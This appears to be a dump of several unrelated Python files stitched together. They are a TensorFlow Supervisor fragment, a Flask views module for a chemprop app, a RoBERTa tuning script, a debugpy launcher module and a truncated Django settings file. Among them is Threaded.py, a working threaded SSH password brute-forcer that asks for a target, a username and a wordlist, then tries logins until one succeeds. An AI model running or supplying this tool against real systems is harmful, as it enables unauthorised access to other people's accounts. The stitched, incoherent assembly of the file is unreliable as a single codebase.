"""Stop the services and the coordinator.
This does not close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services, the
threads started for `QueueRunners`, and the threads started by the
`loop()` method. To wait on additional threads, pass the
list in this parameter.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True` if the summary writer was created by the supervisor, `False`
otherwise.
"""
self._coord.request_stop()
try:
# coord.join() re-raises the first reported exception; the "finally"
# block ensures that we clean up whether or not an exception was
# reported.
self._coord.join(threads,
stop_grace_period_secs=self._stop_grace_secs)
finally:
# Close the writer last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._graph_added_to_summary = False
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._summary_writer:
raise RuntimeError("Writing a summary requires a summary writer.")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
"""Returns the global_step from the default graph.
Returns:
The global step `Tensor` or `None`.
"""
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type in ["Variable", "VariableV2"] and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
# pylint: disable=g-doc-return-or-yield,broad-except
@contextlib.contextmanager
def managed_session(self, master="", config=None,
start_standard_services=True,
close_summary_writer=True):
"""Returns a context manager for a managed session.
This context manager creates and automatically recovers a session. It
optionally starts the standard services that handle checkpoints and
summaries. It monitors exceptions raised from the `with` block or from the
services and stops the supervisor as needed.
The context manager is typically used as follows:
```python
def train():
sv = tf.train.Supervisor(...)
with sv.managed_session(<master>) as sess:
for step in xrange(..):
if sv.should_stop():
break
sess.run(<my training op>)
...do other things needed at each training step...
```
An exception raised from the `with` block or one of the service threads is
raised again when the block exits. This is done after stopping all threads
and closing the session. For example, an `AbortedError` exception, raised
in case of preemption of one of the workers in a distributed model, is
raised again when the block exits.
If you want to retry the training loop in case of preemption you can do it
as follows:
```python
def main(...):
while True
try:
train()
except tf.errors.Aborted:
pass
```
As a special case, exceptions used for control flow, such as
`OutOfRangeError` which reports that input queues are exhausted, are not
raised again from the `with` block: they indicate a clean termination of
the training loop and are considered normal termination.
Args:
master: name of the TensorFlow master to use. See the `tf.Session`
constructor for how this is interpreted.
config: Optional `ConfigProto` proto used to configure the session.
Passed as-is to create the session.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
close_summary_writer: Whether to close the summary writer when
closing the session. Defaults to True.
Returns:
A context manager that yields a `Session` restored from the latest
checkpoint or initialized from scratch if not checkpoint exists. The
session is closed when the `with` block exits.
"""
try:
sess = self.prepare_or_wait_for_session(
master=master, config=config,
start_standard_services=start_standard_services)
yield sess
except Exception as e:
self.request_stop(e)
finally:
try:
# Request all the threads to stop and wait for them to do so. Any
# exception raised by the threads is raised again from stop().
# Passing stop_grace_period_secs is for blocked enqueue/dequeue
# threads which are not checking for `should_stop()`. They
# will be stopped when we close the session further down.
self.stop(close_summary_writer=close_summary_writer)
finally:
# Close the session to finish up all pending calls. We do not care
# about exceptions raised when closing. This takes care of
# blocked enqueue/dequeue calls.
try:
sess.close()
except Exception:
# Silently ignore exceptions raised by close().
pass
# pylint: enable=g-doc-return-or-yield,broad-except
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step])
else:
summary_strs = self._sess.run(self._sv.summary_op)
global_step = None
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
self._summary_tag = "%s/sec" % self._sv.global_step.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._sv.global_step)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._sv.global_step)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
steps_per_sec = added_steps / elapsed_time
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
views.py
|
"""Defines a number of routes/views for the flask app."""
from functools import wraps
import io
import os
import sys
import shutil
from tempfile import TemporaryDirectory, NamedTemporaryFile
import time
from typing import Callable, List, Tuple
import multiprocessing as mp
import zipfile
from flask import json, jsonify, redirect, render_template, request, send_file, send_from_directory, url_for
import numpy as np
from rdkit import Chem
from werkzeug.utils import secure_filename
from app import app, db
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from chemprop.args import PredictArgs, TrainArgs
from chemprop.data.utils import get_data, get_header, get_smiles, validate_data
from chemprop.train.make_predictions import make_predictions
from chemprop.train.run_training import run_training
from chemprop.utils import create_logger, load_task_names, load_args
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
def check_not_demo(func: Callable) -> Callable:
"""
View wrapper, which will redirect request to site
homepage if app is run in DEMO mode.
:param func: A view which performs sensitive behavior.
:return: A view with behavior adjusted based on DEMO flag.
"""
@wraps(func)
def decorated_function(*args, **kwargs):
if app.config['DEMO']:
return redirect(url_for('home'))
return func(*args, **kwargs)
return decorated_function
def progress_bar(args: TrainArgs, progress: mp.Value):
"""
Updates a progress bar displayed during training.
:param args: Arguments.
:param progress: The current progress.
"""
# no code to handle crashes in model training yet, though
current_epoch = -1
while current_epoch < args.epochs - 1:
if os.path.exists(os.path.join(args.save_dir, 'verbose.log')):
with open(os.path.join(args.save_dir, 'verbose.log'), 'r') as f:
content = f.read()
if 'Epoch ' + str(current_epoch + 1) in content:
current_epoch += 1
progress.value = (current_epoch + 1) * 100 / args.epochs
else:
pass
time.sleep(0)
def find_unused_path(path: str) -> str:
"""
Given an initial path, finds an unused path by appending different numbers to the filename.
:param path: An initial path.
:return: An unused path.
"""
if not os.path.exists(path):
return path
base_name, ext = os.path.splitext(path)
i = 2
while os.path.exists(path):
path = base_name + str(i) + ext
i += 1
return path
def name_already_exists_message(thing_being_named: str, original_name: str, new_name: str) -> str:
"""
Creates a message about a path already existing and therefore being renamed.
:param thing_being_named: The thing being renamed (ex. Data, Checkpoint).
:param original_name: The original name of the object.
:param new_name: The new name of the object.
:return: A string with a message about the changed name.
"""
return f'{thing_being_named} "{original_name} already exists. ' \
f'Saving to "{new_name}".'
def get_upload_warnings_errors(upload_item: str) -> Tuple[List[str], List[str]]:
"""
Gets any upload warnings passed along in the request.
:param upload_item: The thing being uploaded (ex. Data, Checkpoint).
:return: A tuple with a list of warning messages and a list of error messages.
"""
warnings_raw = request.args.get(f'{upload_item}_upload_warnings')
errors_raw = request.args.get(f'{upload_item}_upload_errors')
warnings = json.loads(warnings_raw) if warnings_raw is not None else None
errors = json.loads(errors_raw) if errors_raw is not None else None
return warnings, errors
def format_float(value: float, precision: int = 4) -> str:
"""
Formats a float value to a specific precision.
:param value: The float value to format.
:param precision: The number of decimal places to use.
:return: A string containing the formatted float.
"""
return f'{value:.{precision}f}'
def format_float_list(array: List[float], precision: int = 4) -> List[str]:
"""
Formats a list of float values to a specific precision.
:param array: A list of float values to format.
:param precision: The number of decimal places to use.
:return: A list of strings containing the formatted floats.
"""
return [format_float(f, precision) for f in array]
@app.route('/receiver', methods=['POST'])
@check_not_demo
def receiver():
"""Receiver monitoring the progress of training."""
return jsonify(progress=PROGRESS.value, training=TRAINING)
@app.route('/')
def home():
"""Renders the home page."""
return render_template('home.html', users=db.get_all_users())
@app.route('/create_user', methods=['GET', 'POST'])
@check_not_demo
def create_user():
"""
If a POST request is made, creates a new user.
Renders the create_user page.
"""
if request.method == 'GET':
return render_template('create_user.html', users=db.get_all_users())
new_name = request.form['newUserName']
if new_name != None:
db.insert_user(new_name)
return redirect(url_for('create_user'))
def render_train(**kwargs):
"""Renders the train page with specified kwargs."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('train.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/train', methods=['GET', 'POST'])
@check_not_demo
def train():
"""Renders the train page and performs training if request method is POST."""
global PROGRESS, TRAINING
warnings, errors = [], []
if request.method == 'GET':
return render_train()
# Get arguments
data_name, epochs, ensemble_size, checkpoint_name = \
request.form['dataName'], int(request.form['epochs']), \
int(request.form['ensembleSize']), request.form['checkpointName']
gpu = request.form.get('gpu')
data_path = os.path.join(app.config['DATA_FOLDER'], f'{data_name}.csv')
dataset_type = request.form.get('datasetType', 'regression')
# Create and modify args
args = TrainArgs().parse_args([
'--data_path', data_path,
'--dataset_type', dataset_type,
'--epochs', str(epochs),
'--ensemble_size', str(ensemble_size)
])
# Check if regression/classification selection matches data
data = get_data(path=data_path)
targets = data.targets()
unique_targets = {target for row in targets for target in row if target is not None}
if dataset_type == 'classification' and len(unique_targets - {0, 1}) > 0:
errors.append('Selected classification dataset but not all labels are 0 or 1. Select regression instead.')
return render_train(warnings=warnings, errors=errors)
if dataset_type == 'regression' and unique_targets <= {0, 1}:
errors.append('Selected regression dataset but all labels are 0 or 1. Select classification instead.')
return render_train(warnings=warnings, errors=errors)
if gpu is not None:
if gpu == 'None':
args.cuda = False
else:
args.gpu = int(gpu)
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt_id, ckpt_name = db.insert_ckpt(checkpoint_name,
current_user,
args.dataset_type,
args.epochs,
args.ensemble_size,
len(targets))
with TemporaryDirectory() as temp_dir:
args.save_dir = temp_dir
process = mp.Process(target=progress_bar, args=(args, PROGRESS))
process.start()
TRAINING = 1
# Run training
logger = create_logger(name='train', save_dir=args.save_dir, quiet=args.quiet)
task_scores = run_training(args, logger)
process.join()
# Reset globals
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
# Check if name overlap
if checkpoint_name != ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', checkpoint_name, ckpt_name))
# Move models
for root, _, files in os.walk(args.save_dir):
for fname in files:
if fname.endswith('.pt'):
model_id = db.insert_model(ckpt_id)
save_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
shutil.move(os.path.join(args.save_dir, root, fname), save_path)
return render_train(trained=True,
metric=args.metric,
num_tasks=len(args.task_names),
task_names=args.task_names,
task_scores=format_float_list(task_scores),
mean_score=format_float(np.mean(task_scores)),
warnings=warnings,
errors=errors)
def render_predict(**kwargs):
"""Renders the predict page with specified kwargs"""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('predict.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/predict', methods=['GET', 'POST'])
def predict():
"""Renders the predict page and makes predictions if the method is POST."""
if request.method == 'GET':
return render_predict()
# Get arguments
ckpt_id = request.form['checkpointName']
if request.form['textSmiles'] != '':
smiles = request.form['textSmiles'].split()
elif request.form['drawSmiles'] != '':
smiles = [request.form['drawSmiles']]
else:
# Upload data file with SMILES
data = request.files['data']
data_name = secure_filename(data.filename)
data_path = os.path.join(app.config['TEMP_FOLDER'], data_name)
data.save(data_path)
# Check if header is smiles
possible_smiles = get_header(data_path)[0]
smiles = [possible_smiles] if Chem.MolFromSmiles(possible_smiles) is not None else []
# Get remaining smiles
smiles.extend(get_smiles(data_path))
models = db.get_models(ckpt_id)
model_paths = [os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt') for model in models]
task_names = load_task_names(model_paths[0])
num_tasks = len(task_names)
gpu = request.form.get('gpu')
# Create and modify args
args = PredictArgs().parse_args([
'--test_path', 'None',
'--preds_path', os.path.join(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME'])
])
args.checkpoint_paths = model_paths
if gpu is not None:
if gpu == 'None':
args.cuda = False
else:
args.gpu = int(gpu)
train_args = load_args(model_paths[0])
if train_args.features_path is not None:
args.features_generator = ['rdkit_2d_normalized']
args.features_path = None
# Run predictions
preds = make_predictions(args=args, smiles=smiles)
if all(p is None for p in preds):
return render_predict(errors=['All SMILES are invalid'])
# Replace invalid smiles with message
invalid_smiles_warning = 'Invalid SMILES String'
preds = [pred if pred is not None else [invalid_smiles_warning] * num_tasks for pred in preds]
return render_predict(predicted=True,
smiles=smiles,
num_smiles=min(10, len(smiles)),
show_more=max(0, len(smiles)-10),
task_names=task_names,
num_tasks=len(task_names),
preds=preds,
warnings=["List contains invalid SMILES strings"] if None in preds else None,
errors=["No SMILES strings given"] if len(preds) == 0 else None)
@app.route('/download_predictions')
def download_predictions():
"""Downloads predictions as a .csv file."""
return send_from_directory(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME'], as_attachment=True, cache_timeout=-1)
@app.route('/data')
@check_not_demo
def data():
"""Renders the data page."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('data.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users())
@app.route('/data/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_data(return_page: str):
"""
Uploads a data .csv file.
:param return_page: The name of the page to render to after uploading the dataset.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
dataset = request.files['dataset']
with NamedTemporaryFile() as temp_file:
dataset.save(temp_file.name)
dataset_errors = validate_data(temp_file.name)
if len(dataset_errors) > 0:
errors.extend(dataset_errors)
else:
dataset_name = request.form['datasetName']
# dataset_class = load_args(ckpt).dataset_type # TODO: SWITCH TO ACTUALLY FINDING THE CLASS
dataset_id, new_dataset_name = db.insert_dataset(dataset_name, current_user, 'UNKNOWN')
dataset_path = os.path.join(app.config['DATA_FOLDER'], f'{dataset_id}.csv')
if dataset_name != new_dataset_name:
warnings.append(name_already_exists_message('Data', dataset_name, new_dataset_name))
shutil.copy(temp_file.name, dataset_path)
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, data_upload_warnings=warnings, data_upload_errors=errors))
@app.route('/data/download/<int:dataset>')
@check_not_demo
def download_data(dataset: int):
"""
Downloads a dataset as a .csv file.
:param dataset: The id of the dataset to download.
"""
return send_from_directory(app.config['DATA_FOLDER'], f'{dataset}.csv', as_attachment=True, cache_timeout=-1)
@app.route('/data/delete/<int:dataset>')
@check_not_demo
def delete_data(dataset: int):
"""
Deletes a dataset.
:param dataset: The id of the dataset to delete.
"""
db.delete_dataset(dataset)
os.remove(os.path.join(app.config['DATA_FOLDER'], f'{dataset}.csv'))
return redirect(url_for('data'))
@app.route('/checkpoints')
@check_not_demo
def checkpoints():
"""Renders the checkpoints page."""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('checkpoints.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users())
@app.route('/checkpoints/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_checkpoint(return_page: str):
"""
Uploads a checkpoint .pt file.
:param return_page: The name of the page to render after uploading the checkpoint file.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt = request.files['checkpoint']
ckpt_name = request.form['checkpointName']
ckpt_ext = os.path.splitext(ckpt.filename)[1]
# Collect paths to all uploaded checkpoints (and unzip if necessary)
temp_dir = TemporaryDirectory()
ckpt_paths = []
if ckpt_ext.endswith('.pt'):
ckpt_path = os.path.join(temp_dir.name, 'model.pt')
ckpt.save(ckpt_path)
ckpt_paths = [ckpt_path]
elif ckpt_ext.endswith('.zip'):
ckpt_dir = os.path.join(temp_dir.name, 'models')
zip_path = os.path.join(temp_dir.name, 'models.zip')
ckpt.save(zip_path)
with zipfile.ZipFile(zip_path, mode='r') as z:
z.extractall(ckpt_dir)
for root, _, fnames in os.walk(ckpt_dir):
ckpt_paths += [os.path.join(root, fname) for fname in fnames if fname.endswith('.pt')]
else:
errors.append(f'Uploaded checkpoint(s) file must be either .pt or .zip but got {ckpt_ext}')
# Insert checkpoints into database
if len(ckpt_paths) > 0:
ckpt_args = load_args(ckpt_paths[0])
ckpt_id, new_ckpt_name = db.insert_ckpt(ckpt_name,
current_user,
ckpt_args.dataset_type,
ckpt_args.epochs,
len(ckpt_paths),
ckpt_args.train_data_size)
for ckpt_path in ckpt_paths:
model_id = db.insert_model(ckpt_id)
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
if ckpt_name != new_ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', ckpt_name, new_ckpt_name))
shutil.copy(ckpt_path, model_path)
temp_dir.cleanup()
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, checkpoint_upload_warnings=warnings, checkpoint_upload_errors=errors))
@app.route('/checkpoints/download/<int:checkpoint>')
@check_not_demo
def download_checkpoint(checkpoint: int):
"""
Downloads a zip of model .pt files.
:param checkpoint: The name of the checkpoint to download.
"""
ckpt = db.query_db(f'SELECT * FROM ckpt WHERE id = {checkpoint}', one = True)
models = db.get_models(checkpoint)
model_data = io.BytesIO()
with zipfile.ZipFile(model_data, mode='w') as z:
for model in models:
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt')
z.write(model_path, os.path.basename(model_path))
model_data.seek(0)
return send_file(
model_data,
mimetype='application/zip',
as_attachment=True,
attachment_filename=f'{ckpt["ckpt_name"]}.zip',
cache_timeout=-1
)
@app.route('/checkpoints/delete/<int:checkpoint>')
@check_not_demo
def delete_checkpoint(checkpoint: int):
"""
Deletes a checkpoint file.
:param checkpoint: The id of the checkpoint to delete.
"""
db.delete_ckpt(checkpoint)
return redirect(url_for('checkpoints'))
|
grid_minimizer.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 10 00:08:57 2019
@author: Nate
"""
from simpletransformers.classification import ClassificationModel
import pandas as pd
from sklearn.utils import shuffle
from sklearn.metrics import f1_score, accuracy_score
from skopt import gp_minimize
from skopt.space import Real, Integer, Categorical
from tqdm import tqdm
from skopt.utils import use_named_args
import multiprocessing as mp
from sklearn.metrics import confusion_matrix
# accuracy metrics function
def f1(labels, preds):
return f1_score(labels, preds, average='micro')
def func(params, train, test):
# attempt to read df
try:
df = pd.read_csv('opt_results.csv', index_col='Unnamed: 0')
except:
df = pd.DataFrame()
args = dict()
try:
model = ClassificationModel('roberta', 'roberta-base', num_labels=5)
args = {'overwrite_output_dir': True,'reprocess_input_data': True,
'sliding_window': True, 'train_batch_size':8, 'eval_batch_size':8,
'gradient_accumulation_steps':2, 'max_seq_length':512}
args.update(params)
model.train_model(train, args=args)
result, outputs, _ = model.eval_model(test, f1=f1, acc=accuracy_score)
predict = [row.argmax() for row in outputs]
args.update(result)
args['confusion_matrix'] = confusion_matrix(test['label'], predict)
except Exception as e:
# add exception and 0 for metrics
print(e)
args['exception'] = e
# append and save df
df = df.append(args, ignore_index=True)
writing = True
while writing:
try:
df.to_csv('opt_results.csv')
writing = False
except Exception as e:
print(e)
if __name__ == '__main__':
params = [{'num_train_epochs':1, 'learning_rate':2e-5},
{'num_train_epochs':1, 'learning_rate':3e-5},
{'num_train_epochs':2, 'learning_rate':4e-5},
{'num_train_epochs':4, 'learning_rate':4e-5}]
train = pd.read_csv('tmp_train.csv',index_col='Unnamed: 0')
test = pd.read_csv('tmp_test.csv', index_col='Unnamed: 0')
test.columns = ['text', 'label']
train.columns = ['text', 'label']
for args in params:
p = mp.Process(target=func, args=(args, train, test,))
p.start()
p.join()
p.terminate()
|
Threaded.py
|
import paramiko, sys, os, socket, termcolor
import threading, time
stop_flag = 0
def ssh_connect(password, code=0):
global stop_flag
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
ssh.connect(host, port=22, username=username, password=password)
stop_flag = 1
print(termcolor.colored(('[+] Found password: ' + password + ' , For account: ' + username), 'green'))
except:
print(permcolor.colored(('[-] Incorrect login: ' + password), 'red'))
ssh.close()
host = input('[+] Target address: ')
username = input('[+] SSH username: ')
input_file = input('[+] Passwords file: ')
print('\n')
if os.path.exists(input_file) == False:
print('[!] That file/path does not exist')
sys.exit(1)
print(' * * * Starting threaded SSH bruteforce on ' + host + ' With account: ' + username + '* * *')
#read password in the line
with open(input_file, 'r')as file:
for line in file.readlines():
if stop_flag == 1:
t.join()
exit()
password = line.strip()
t = threading.Thread(target=ssh_connect, args=(password,))
t.start()
time.sleep(0.5)
|
debuggee.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import atexit
import os
import struct
import subprocess
import sys
import threading
from debugpy import launcher
from debugpy.common import fmt, log, messaging, compat
from debugpy.launcher import output
process = None
"""subprocess.Popen instance for the debuggee process."""
wait_on_exit_predicates = []
"""List of functions that determine whether to pause after debuggee process exits.
Every function is invoked with exit code as the argument. If any of the functions
returns True, the launcher pauses and waits for user input before exiting.
"""
def describe():
return fmt("Debuggee[PID={0}]", process.pid)
def spawn(process_name, cmdline, env, redirect_output):
log.info(
"Spawning debuggee process:\n\n"
"Command line: {0!r}\n\n"
"Environment variables: {1!r}\n\n",
cmdline,
env,
)
close_fds = set()
try:
if redirect_output:
# subprocess.PIPE behavior can vary substantially depending on Python version
# and platform; using our own pipes keeps it simple, predictable, and fast.
stdout_r, stdout_w = os.pipe()
stderr_r, stderr_w = os.pipe()
close_fds |= {stdout_r, stdout_w, stderr_r, stderr_w}
kwargs = dict(stdout=stdout_w, stderr=stderr_w)
else:
kwargs = {}
try:
global process
process = subprocess.Popen(cmdline, env=env, bufsize=0, **kwargs)
except Exception as exc:
raise messaging.MessageHandlingError(
fmt("Couldn't spawn debuggee: {0}\n\nCommand line:{1!r}", exc, cmdline)
)
log.info("Spawned {0}.", describe())
atexit.register(kill)
launcher.channel.send_event(
"process",
{
"startMethod": "launch",
"isLocalProcess": True,
"systemProcessId": process.pid,
"name": process_name,
"pointerSize": struct.calcsize(compat.force_str("P")) * 8,
},
)
if redirect_output:
for category, fd, tee in [
("stdout", stdout_r, sys.stdout),
("stderr", stderr_r, sys.stderr),
]:
output.CaptureOutput(describe(), category, fd, tee)
close_fds.remove(fd)
wait_thread = threading.Thread(target=wait_for_exit, name="wait_for_exit()")
wait_thread.daemon = True
wait_thread.start()
finally:
for fd in close_fds:
try:
os.close(fd)
except Exception:
log.swallow_exception()
def kill():
if process is None:
return
try:
if process.poll() is None:
log.info("Killing {0}", describe())
process.kill()
except Exception:
log.swallow_exception("Failed to kill {0}", describe())
def wait_for_exit():
try:
code = process.wait()
if sys.platform != "win32" and code < 0:
# On POSIX, if the process was terminated by a signal, Popen will use
# a negative returncode to indicate that - but the actual exit code of
# the process is always an unsigned number, and can be determined by
# taking the lowest 8 bits of that negative returncode.
code &= 0xFF
except Exception:
log.swallow_exception("Couldn't determine process exit code:")
code = -1
log.info("{0} exited with code {1}", describe(), code)
output.wait_for_remaining_output()
# Determine whether we should wait or not before sending "exited", so that any
# follow-up "terminate" requests don't affect the predicates.
should_wait = any(pred(code) for pred in wait_on_exit_predicates)
try:
launcher.channel.send_event("exited", {"exitCode": code})
except Exception:
pass
if should_wait:
_wait_for_user_input()
try:
launcher.channel.send_event("terminated")
except Exception:
pass
def _wait_for_user_input():
if sys.stdout and sys.stdin and sys.stdin.isatty():
from debugpy.common import log
try:
import msvcrt
except ImportError:
can_getch = False
else:
can_getch = True
if can_getch:
log.debug("msvcrt available - waiting for user input via getch()")
sys.stdout.write("Press any key to continue . . . ")
sys.stdout.flush()
msvcrt.getch()
else:
log.debug("msvcrt not available - waiting for user input via read()")
sys.stdout.write("Press Enter to continue . . . ")
sys.stdout.flush()
sys.stdin.read(1)
|
settings_20210906114807.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:47").do(decrease_day_count_and_send_bday_mails)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(60)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
